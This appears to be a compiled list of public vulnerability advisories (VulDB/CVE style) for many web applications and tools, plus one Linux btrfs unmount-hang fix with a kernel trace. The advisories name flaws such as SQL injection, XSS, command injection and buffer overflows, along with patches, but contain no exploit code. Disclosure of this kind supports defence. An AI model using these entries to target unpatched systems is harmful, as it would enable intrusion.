A vulnerability was found in Evolution Events Artaxerxes. It has been declared as problematic. This vulnerability affects unknown code of the file arta/common/middleware.py of the component POST Parameter Handler. The manipulation of the argument password leads to information disclosure. The attack can be initiated remotely. The patch is identified as 022111407d34815c16c6eada2de69ca34084dc0d. It is recommended to apply a patch to fix this issue. VDB-217438 is the identifier assigned to this vulnerability.
In the Linux kernel, the following vulnerability has been resolved: btrfs: fix hang during unmount when stopping a space reclaim worker Often when running generic/562 from fstests we can hang during unmount, resulting in a trace like this: Sep 07 11:52:00 debian9 unknown: run fstests generic/562 at 2022-09-07 11:52:00 Sep 07 11:55:32 debian9 kernel: INFO: task umount:49438 blocked for more than 120 seconds. Sep 07 11:55:32 debian9 kernel: Not tainted 6.0.0-rc2-btrfs-next-122 #1 Sep 07 11:55:32 debian9 kernel: "echo 0 &gt; /proc/sys/kernel/hung_task_timeout_secs" disables this message. Sep 07 11:55:32 debian9 kernel: task:umount state:D stack: 0 pid:49438 ppid: 25683 flags:0x00004000 Sep 07 11:55:32 debian9 kernel: Call Trace: Sep 07 11:55:32 debian9 kernel: &lt;TASK&gt; Sep 07 11:55:32 debian9 kernel: __schedule+0x3c8/0xec0 Sep 07 11:55:32 debian9 kernel: ? rcu_read_lock_sched_held+0x12/0x70 Sep 07 11:55:32 debian9 kernel: schedule+0x5d/0xf0 Sep 07 11:55:32 debian9 kernel: schedule_timeout+0xf1/0x130 Sep 07 11:55:32 debian9 kernel: ? lock_release+0x224/0x4a0 Sep 07 11:55:32 debian9 kernel: ? lock_acquired+0x1a0/0x420 Sep 07 11:55:32 debian9 kernel: ? trace_hardirqs_on+0x2c/0xd0 Sep 07 11:55:32 debian9 kernel: __wait_for_common+0xac/0x200 Sep 07 11:55:32 debian9 kernel: ? usleep_range_state+0xb0/0xb0 Sep 07 11:55:32 debian9 kernel: __flush_work+0x26d/0x530 Sep 07 11:55:32 debian9 kernel: ? flush_workqueue_prep_pwqs+0x140/0x140 Sep 07 11:55:32 debian9 kernel: ? trace_clock_local+0xc/0x30 Sep 07 11:55:32 debian9 kernel: __cancel_work_timer+0x11f/0x1b0 Sep 07 11:55:32 debian9 kernel: ? close_ctree+0x12b/0x5b3 [btrfs] Sep 07 11:55:32 debian9 kernel: ? __trace_bputs+0x10b/0x170 Sep 07 11:55:32 debian9 kernel: close_ctree+0x152/0x5b3 [btrfs] Sep 07 11:55:32 debian9 kernel: ? evict_inodes+0x166/0x1c0 Sep 07 11:55:32 debian9 kernel: generic_shutdown_super+0x71/0x120 Sep 07 11:55:32 debian9 kernel: kill_anon_super+0x14/0x30 Sep 07 11:55:32 debian9 kernel: btrfs_kill_super+0x12/0x20 [btrfs] Sep 07 11:55:32 debian9 kernel: deactivate_locked_super+0x2e/0xa0 Sep 07 11:55:32 debian9 kernel: cleanup_mnt+0x100/0x160 Sep 07 11:55:32 debian9 kernel: task_work_run+0x59/0xa0 Sep 07 11:55:32 debian9 kernel: exit_to_user_mode_prepare+0x1a6/0x1b0 Sep 07 11:55:32 debian9 kernel: syscall_exit_to_user_mode+0x16/0x40 Sep 07 11:55:32 debian9 kernel: do_syscall_64+0x48/0x90 Sep 07 11:55:32 debian9 kernel: entry_SYSCALL_64_after_hwframe+0x63/0xcd Sep 07 11:55:32 debian9 kernel: RIP: 0033:0x7fcde59a57a7 Sep 07 11:55:32 debian9 kernel: RSP: 002b:00007ffe914217c8 EFLAGS: 00000246 ORIG_RAX: 00000000000000a6 Sep 07 11:55:32 debian9 kernel: RAX: 0000000000000000 RBX: 00007fcde5ae8264 RCX: 00007fcde59a57a7 Sep 07 11:55:32 debian9 kernel: RDX: 0000000000000000 RSI: 0000000000000000 RDI: 000055b57556cdd0 Sep 07 11:55:32 debian9 kernel: RBP: 000055b57556cba0 R08: 0000000000000000 R09: 00007ffe91420570 Sep 07 11:55:32 debian9 kernel: R10: 0000000000000000 R11: 0000000000000246 R12: 0000000000000000 Sep 07 11:55:32 debian9 kernel: R13: 000055b57556cdd0 R14: 000055b57556ccb8 R15: 0000000000000000 Sep 07 11:55:32 debian9 kernel: &lt;/TASK&gt; What happens is the following: 1) The cleaner kthread tries to start a transaction to delete an unused block group, but the metadata reservation can not be satisfied right away, so a reservation ticket is created and it starts the async metadata reclaim task (fs_info-&gt;async_reclaim_work); 2) Writeback for all the filler inodes with an i_size of 2K starts (generic/562 creates a lot of 2K files with the goal of filling metadata space). We try to create an inline extent for them, but we fail when trying to insert the inline extent with -ENOSPC (at cow_file_range_inline()) - since this is not critical, we fallback to non-inline mode (back to cow_file_range()), reserve extents ---truncated---
A vulnerability was found in Modbus Tools Modbus Poll up to 9.10.0 and classified as critical. Affected by this issue is some unknown functionality of the file mbpoll.exe of the component mbp File Handler. The manipulation leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-217022 is the identifier assigned to this vulnerability.
A vulnerability has been found in Modbus Tools Modbus Slave up to 7.5.1 and classified as critical. Affected by this vulnerability is an unknown functionality of the file mbslave.exe of the component mbs File Handler. The manipulation leads to buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-217021 was assigned to this vulnerability.
A vulnerability, which was classified as critical, was found in SourceCodester Lead Management System 1.0. Affected is an unknown function of the file login.php. The manipulation of the argument username leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-217020.
A vulnerability, which was classified as problematic, was found in InSTEDD Nuntium. Affected is an unknown function of the file app/controllers/geopoll_controller.rb. The manipulation of the argument signature leads to observable timing discrepancy. It is possible to launch the attack remotely. The name of the patch is 77236f7fd71a0e2eefeea07f9866b069d612cf0d. It is recommended to apply a patch to fix this issue. VDB-217002 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in FlatPress. This issue affects some unknown processing of the file setup/lib/main.lib.php of the component Setup. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 5f23b4c2eac294cc0ba5e541f83a6f8a26f9fed1. It is recommended to apply a patch to fix this issue. The identifier VDB-217001 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in FlatPress. This affects an unknown part of the file admin/panels/entry/admin.entry.list.php of the component Admin Area. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is 229752b51025e678370298284d42f8ebb231f67f. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216999.
A vulnerability was found in HotCRP. It has been rated as problematic. Affected by this issue is some unknown functionality. The manipulation leads to cross site scripting. The attack may be launched remotely. The name of the patch is d4ffdb0ef806453c54ddca7fdda3e5c60356285c. It is recommended to apply a patch to fix this issue. VDB-216998 is the identifier assigned to this vulnerability.
A vulnerability was found in Talend Open Studio for MDM. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file org.talend.mdm.core/src/com/amalto/core/storage/SystemStorageWrapper.java. The manipulation leads to xml external entity reference. Upgrading to version 20221220_1938 is able to address this issue. The name of the patch is 95590db2ad6a582c371273ceab1a73ad6ed47853. It is recommended to upgrade the affected component. The identifier VDB-216997 was assigned to this vulnerability.
A vulnerability was found in centic9 jgit-cookbook. It has been declared as problematic. This vulnerability affects unknown code. The manipulation leads to insecure temporary file. The attack can be initiated remotely. The name of the patch is b8cb29b43dc704708d598c60ac1881db7cf8e9c3. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216988.
A vulnerability was found in dolibarr_project_timesheet up to 4.5.5. It has been declared as problematic. This vulnerability affects unknown code of the component Form Handler. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. Upgrading to version 4.5.6.a is able to address this issue. The name of the patch is 082282e9dab43963e6c8f03cfaddd7921de377f4. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216880.
A vulnerability classified as critical was found in SourceCodester School Dormitory Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Admin Login. The manipulation leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-216775.
A vulnerability classified as problematic has been found in SourceCodester Blood Bank Management System 1.0. Affected is an unknown function of the file index.php?page=users of the component User Registration Handler. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-216774 is the identifier assigned to this vulnerability.
A vulnerability was found in SourceCodester Blood Bank Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file login.php. The manipulation of the argument username/password leads to sql injection. The attack may be initiated remotely. The identifier VDB-216773 was assigned to this vulnerability.
A vulnerability was found in Venganzas del Pasado and classified as problematic. Affected by this issue is some unknown functionality. The manipulation of the argument the_title leads to cross site scripting. The attack may be launched remotely. The name of the patch is 62339b2ec445692c710b804bdf07aef4bd247ff7. It is recommended to apply a patch to fix this issue. VDB-216770 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in myapnea up to 29.0.x. Affected is an unknown function of the component Title Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 29.1.0 is able to address this issue. The name of the patch is 99934258530d761bd5d09809bfa6c14b598f8d18. It is recommended to upgrade the affected component. VDB-216750 is the identifier assigned to this vulnerability.
A vulnerability was found in Graphite Web. It has been classified as problematic. Affected is an unknown function of the component Absolute Time Range Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216744.
A vulnerability was found in Graphite Web and classified as problematic. This issue affects some unknown processing of the component Template Name Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216743.
A vulnerability has been found in Graphite Web and classified as problematic. This vulnerability affects unknown code of the component Cookie Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 2f178f490e10efc03cd1d27c72f64ecab224eb23. It is recommended to apply a patch to fix this issue. VDB-216742 is the identifier assigned to this vulnerability.
A vulnerability classified as critical was found in SourceCodester Sanitization Management System 1.0. Affected by this vulnerability is an unknown functionality of the component Admin Login. The manipulation of the argument username/password leads to sql injection. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-216739.
A vulnerability was found in tatoeba2. It has been classified as problematic. This affects an unknown part of the component Profile Name Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version prod_2022-10-30 is able to address this issue. The name of the patch is 91110777fc8ddf1b4a2cf4e66e67db69b9700361. It is recommended to upgrade the affected component. The identifier VDB-216501 was assigned to this vulnerability.
A vulnerability classified as problematic has been found in ep3-bs up to 1.7.x. This affects an unknown part. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.8.0 is able to address this issue. The name of the patch is ef49e709c8adecc3a83cdc6164a67162991d2213. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216495.
A vulnerability was found in Auto Upload Images up to 3.3.0 and classified as problematic. Affected by this issue is some unknown functionality of the file src/setting-page.php of the component Settings Handler. The manipulation leads to cross-site request forgery. The attack may be launched remotely. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 895770ee93887ec78429c78ffdfb865bee6f9436. It is recommended to upgrade the affected component. VDB-216482 is the identifier assigned to this vulnerability.
A vulnerability has been found in Auto Upload Images up to 3.3.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 3.3.1 is able to address this issue. The name of the patch is 895770ee93887ec78429c78ffdfb865bee6f9436. It is recommended to upgrade the affected component. The identifier VDB-216481 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in WP-Ban. Affected is an unknown function of the file ban-options.php. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 22b925449c84faa9b7496abe4f8f5661cb5eb3bf. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216480.
A vulnerability was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome and classified as critical. This issue affects some unknown processing of the component Browser Extension Provisioning. The manipulation leads to improper authorization. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216275.
A vulnerability has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome and classified as problematic. This vulnerability affects unknown code. The manipulation leads to insufficiently protected credentials. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. VDB-216274 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. This affects an unknown part. The manipulation leads to hard-coded credentials. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The identifier VDB-216273 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Click Studios Passwordstate and Passwordstate Browser Extension Chrome. Affected by this issue is some unknown functionality. The manipulation leads to risky cryptographic algorithm. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216272.
A vulnerability was found in 3D City Database OGC Web Feature Service up to 5.2.0. It has been rated as problematic. This issue affects some unknown processing. The manipulation leads to xml external entity reference. Upgrading to version 5.2.1 is able to address this issue. The name of the patch is 246f4e2a97ad81491c00a7ed72ce5e7c7f75050a. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-216215.
A vulnerability was found in Shoplazza LifeStyle 1.1. It has been rated as problematic. This issue affects some unknown processing of the file /admin/api/theme-edit/ of the component Review Flow Handler. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-216197 was assigned to this vulnerability.
A vulnerability was found in Shoplazza LifeStyle 1.1. It has been declared as problematic. This vulnerability affects unknown code of the file /admin/api/theme-edit/ of the component Shipping/Member Discount/Icon. The manipulation leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216196.
A vulnerability was found in Shoplazza LifeStyle 1.1. It has been classified as problematic. This affects an unknown part of the file /admin/api/theme-edit/ of the component Product Carousel Handler. The manipulation of the argument Heading/Description leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-216195.
A vulnerability was found in Shoplazza LifeStyle 1.1 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/api/theme-edit/ of the component Product Handler. The manipulation of the argument Subheading/Heading/Text/Button Text/Label leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-216194 is the identifier assigned to this vulnerability.
A vulnerability has been found in Shoplazza LifeStyle 1.1 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/api/theme-edit/ of the component Announcement Handler. The manipulation of the argument Text/Mobile Text leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-216193 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Shoplazza LifeStyle 1.1. Affected is an unknown function of the file /admin/api/admin/v2_products of the component Create Product Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-216192.
A vulnerability, which was classified as problematic, has been found in Shoplazza 1.1. This issue affects some unknown processing of the file /admin/api/admin/articles/ of the component Add Blog Post Handler. The manipulation of the argument Title leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-216191.
A vulnerability classified as problematic has been found in django-openipam. This affects an unknown part of the file openipam/report/templates/report/exposed_hosts.html. The manipulation of the argument description leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is a6223a1150d60cd036106ba6a8e676c1bfc3cc85. It is recommended to apply a patch to fix this issue. The identifier VDB-216189 was assigned to this vulnerability.
A vulnerability was found in retra-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is a6d94ab88f4a6f631a14c59b72461140fb57ae1f. It is recommended to apply a patch to fix this issue. VDB-216186 is the identifier assigned to this vulnerability.
A vulnerability was found in mschaef toto up to 1.4.20. It has been declared as problematic. This vulnerability affects unknown code of the component Email Parameter Handler. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 1.4.21 is able to address this issue. The name of the patch is 1f27f37c1a06f54a76971f70eaa6139dc139bdf9. It is recommended to upgrade the affected component. VDB-216178 is the identifier assigned to this vulnerability.
A vulnerability was found in mschaef toto up to 1.4.20. It has been classified as problematic. This affects an unknown part of the component Todo List Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 1.4.21 is able to address this issue. The name of the patch is fdc825ac5249f40683377e8a526a06cdc6870125. It is recommended to upgrade the affected component. The identifier VDB-216177 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Boston Sleep slice up to 84.1.x. Affected is an unknown function of the component Layout Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 84.2.0 is able to address this issue. The name of the patch is 6523bb17d889e2ab13d767f38afefdb37083f1d0. It is recommended to upgrade the affected component. VDB-216174 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in Opencaching Deutschland oc-server3. This issue affects some unknown processing of the file htdocs/templates2/ocstyle/login.tpl of the component Login Page. The manipulation of the argument username leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 3296ebd61e7fe49e93b5755d5d7766d6e94a7667. It is recommended to apply a patch to fix this issue. The identifier VDB-216173 was assigned to this vulnerability.
A vulnerability classified as problematic was found in Opencaching Deutschland oc-server3. This vulnerability affects unknown code of the file htdocs/templates2/ocstyle/cachelists.tpl of the component Cachelist Handler. The manipulation of the argument name_filter/by_filter leads to cross site scripting. The attack can be initiated remotely. The name of the patch is a9f79c7da78cd24a7ef1d298e6bc86006972ea73. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-216172.
A vulnerability classified as problematic has been found in Opencaching Deutschland oc-server3. This affects an unknown part of the file htdocs/templates2/ocstyle/start.tpl of the component Cookie Handler. The manipulation of the argument usercountryCode leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is c720f2777a452186c67ef30db3679dd409556544. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216171.
A vulnerability was found in Axiomatic Bento4 up to 1.6.0-639. It has been rated as critical. Affected by this issue is some unknown functionality of the component mp42aac. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-216170 is the identifier assigned to this vulnerability.
A vulnerability was found in starter-public-edition-4 up to 4.6.10. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. Upgrading to version 4.6.11 is able to address this issue. The name of the patch is 2606983c20f6ea3430ac4b36b3d2e88aafef45da. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-216168.
A vulnerability was found in 1j01 mind-map and classified as problematic. This issue affects some unknown processing of the file app.coffee. The manipulation of the argument html leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9617e6084dfeccd92079ab4d7f439300a4b24394. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-216167.
A vulnerability, which was classified as critical, has been found in y_project RuoYi 4.7.5. This issue affects some unknown processing of the file com/ruoyi/generator/controller/GenController. The manipulation leads to sql injection. The name of the patch is 167970e5c4da7bb46217f576dc50622b83f32b40. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215975.
A vulnerability classified as problematic was found in Dromara HuTool up to 5.8.10. This vulnerability affects unknown code of the file cn.hutool.core.util.ZipUtil.java. The manipulation leads to resource consumption. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.8.11 is able to address this issue. It is recommended to upgrade the affected component. VDB-215974 is the identifier assigned to this vulnerability.
A vulnerability was found in Freedom of the Press SecureDrop. It has been rated as critical. Affected by this issue is some unknown functionality of the file gpg-agent.conf. The manipulation leads to symlink following. Local access is required to approach this attack. The name of the patch is b0526a06f8ca713cce74b63e00d3730618d89691. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215972.
A vulnerability was found in INEX IPX-Manager up to 6.2.0. It has been declared as problematic. This vulnerability affects unknown code of the file resources/views/customer/list.foil.php. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 6.3.0 is able to address this issue. The name of the patch is bc9b14c6f70cccdb89b559e8bc3a7318bfe9c243. It is recommended to upgrade the affected component. VDB-215962 is the identifier assigned to this vulnerability.
A vulnerability was found in Alinto SOGo up to 5.7.1. It has been classified as problematic. This affects an unknown part of the file SoObjects/SOGo/NSString+Utilities.m of the component Folder/Mail Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 5.8.0 is able to address this issue. The name of the patch is 1e0f5f00890f751e84d67be4f139dd7f00faa5f3. It is recommended to upgrade the affected component. The identifier VDB-215961 was assigned to this vulnerability.
A vulnerability was found in django-photologue up to 3.15.1 and classified as problematic. Affected by this issue is some unknown functionality of the file photologue/templates/photologue/photo_detail.html of the component Default Template Handler. The manipulation of the argument object.caption leads to cross site scripting. The attack may be launched remotely. Upgrading to version 3.16 is able to address this issue. The name of the patch is 960cb060ce5e2964e6d716ff787c72fc18a371e7. It is recommended to apply a patch to fix this issue. VDB-215906 is the identifier assigned to this vulnerability.
A vulnerability has been found in National Sleep Research Resource sleepdata.org up to 58.x and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 59.0.0.rc is able to address this issue. The name of the patch is da44a3893b407087829b006d09339780919714cd. It is recommended to upgrade the affected component. The identifier VDB-215905 was assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in vexim2. This issue affects some unknown processing. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 21c0a60d12e9d587f905cd084b2c70f9b1592065. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215903.
A vulnerability classified as problematic was found in CalendarXP up to 10.0.1. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. Upgrading to version 10.0.2 is able to address this issue. The name of the patch is e3715b2228ddefe00113296069969f9e184836da. It is recommended to upgrade the affected component. VDB-215902 is the identifier assigned to this vulnerability.
A vulnerability classified as problematic has been found in WSO2 carbon-registry up to 4.8.6. This affects an unknown part of the component Request Parameter Handler. The manipulation of the argument parentPath/path/username/path/profile_menu leads to cross site scripting. It is possible to initiate the attack remotely. Upgrading to version 4.8.7 is able to address this issue. The name of the patch is 9f967abfde9317bee2cda469dbc09b57d539f2cc. It is recommended to upgrade the affected component. The identifier VDB-215901 was assigned to this vulnerability.
A vulnerability was found in WSO2 carbon-registry up to 4.8.11. It has been rated as problematic. Affected by this issue is some unknown functionality of the file components/registry/org.wso2.carbon.registry.search.ui/src/main/resources/web/search/advancedSearchForm-ajaxprocessor.jsp of the component Advanced Search. The manipulation of the argument mediaType/rightOp/leftOp/rightPropertyValue/leftPropertyValue leads to cross site scripting. The attack may be launched remotely. Upgrading to version 4.8.12 is able to address this issue. The name of the patch is 0c827cc1b14b82d8eb86117ab2e43c34bb91ddb4. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215900.
A vulnerability, which was classified as problematic, was found in Opencaching Deutschland oc-server3. Affected is an unknown function of the file htdocs/lang/de/ocstyle/varset.inc.php. The manipulation of the argument varvalue leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The name of the patch is 4bdd6a0e7b7760cea03b91812cbb80d7b16e3b5f. It is recommended to apply a patch to fix this issue. VDB-215886 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, has been found in European Environment Agency eionet.contreg. This issue affects some unknown processing. The manipulation of the argument searchTag/resourceUri leads to cross site scripting. The attack may be initiated remotely. Upgrading to version 2022-06-27T0948 is able to address this issue. The name of the patch is a120c2153e263e62c4db34a06ab96a9f1c6bccb6. It is recommended to upgrade the affected component. The identifier VDB-215885 was assigned to this vulnerability.
A vulnerability has been found in RainyGao DocSys and classified as critical. Affected by this vulnerability is an unknown functionality of the component com.DocSystem.controller.UserController#getUserImg. The manipulation leads to path traversal: '../filedir'. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-215851.
An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 2 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is High. Privileges required are administrator, User Interaction is required, and Scope is unchanged. The user must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host.
An issue was discovered in NetScout nGeniusONE 6.3.2 build 904. Open Redirection can occur (issue 1 of 2). After successful login, an attacker must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host. The attack vector is Network, and the Attack Complexity required is High. Privileges required are administrator, User Interaction is required, and Scope is unchanged. The user must visit the vulnerable parameter and inject a crafted payload to successfully redirect to an unknown host.
A vulnerability has been found in falling-fruit and classified as problematic. This vulnerability affects unknown code. The manipulation leads to cross site scripting. The attack can be initiated remotely. The name of the patch is 15adb8e1ea1f1c3e3d152fc266071f621ef0c621. It is recommended to apply a patch to fix this issue. VDB-215446 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in sproctor php-calendar. This affects an unknown part of the file index.php. The manipulation of the argument $_SERVER['PHP_SELF'] leads to cross site scripting. It is possible to initiate the attack remotely. The name of the patch is a2941109b42201c19733127ced763e270a357809. It is recommended to apply a patch to fix this issue. The identifier VDB-215445 was assigned to this vulnerability.
A vulnerability was found in ipti br.tag. It has been declared as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely. Upgrading to version 2.13.0 is able to address this issue. The name of the patch is 7e311be22d3a0a1b53e61cb987ba13d681d85f06. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-215431.
libming 0.4.8 0.4.8 is vulnerable to Buffer Overflow. In getInt() in decompile.c unknown type may lead to denial of service. This is a different vulnerability than CVE-2018-9132 and CVE-2018-20427.
A vulnerability was found in rAthena FluxCP. It has been classified as problematic. Affected is an unknown function of the file themes/default/servicedesk/view.php of the component Service Desk Image URL Handler. The manipulation of the argument sslink leads to cross site scripting. It is possible to launch the attack remotely. The name of the patch is 8a39b2b2bf28353b3503ff1421862393db15aa7e. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215304.
A vulnerability classified as critical was found in SourceCodester Canteen Management System. This vulnerability affects unknown code of the file ajax_represent.php. The manipulation of the argument customer_id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215272.
A vulnerability classified as critical has been found in RainyGao DocSys 2.02.37. This affects an unknown part of the component ZIP File Decompression Handler. The manipulation leads to path traversal: '../filedir'. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-215271.
A vulnerability was found in pallidlight online-course-selection-system. It has been classified as problematic. Affected is an unknown function. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-215268.
A vulnerability was found in zbl1996 FS-Blog and classified as problematic. This issue affects some unknown processing of the component Title Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this vulnerability is VDB-215267.
A vulnerability was found in TicklishHoneyBee nodau. It has been rated as critical. Affected by this issue is some unknown functionality of the file src/db.c. The manipulation of the argument value/name leads to sql injection. The name of the patch is 7a7d737a3929f335b9717ddbd31db91151b69ad2. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-215252.
A vulnerability was found in morontt zend-blog-number-2. It has been classified as problematic. Affected is an unknown function of the file application/forms/Comment.php of the component Comment Handler. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The name of the patch is 36b2d4abe20a6245e4f8df7a4b14e130b24d429d. It is recommended to apply a patch to fix this issue. VDB-215250 is the identifier assigned to this vulnerability.
A vulnerability was found in S-CMS 5.0 Build 20220328. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the component Contact Information Page. The manipulation of the argument Make a Call leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-215197 was assigned to this vulnerability.
A vulnerability was found in Mingsoft MCMS up to 5.2.9. It has been classified as critical. Affected is an unknown function of the file /cms/category/list. The manipulation of the argument sqlWhere leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 5.2.10 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-215196.
A vulnerability classified as critical has been found in Teledyne FLIR AX8 up to 1.46.16. Affected is an unknown function of the file palette.php of the component Web Service Handler. The manipulation of the argument palette leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-215118 is the identifier assigned to this vulnerability.
A vulnerability was found in LinZhaoguan pb-cms 2.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /blog/comment of the component Message Board. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-215114 is the identifier assigned to this vulnerability.
A vulnerability, which was classified as problematic, was found in Mingsoft MCMS 5.2.8. Affected is an unknown function of the file search.do. The manipulation of the argument content_title leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-215112.
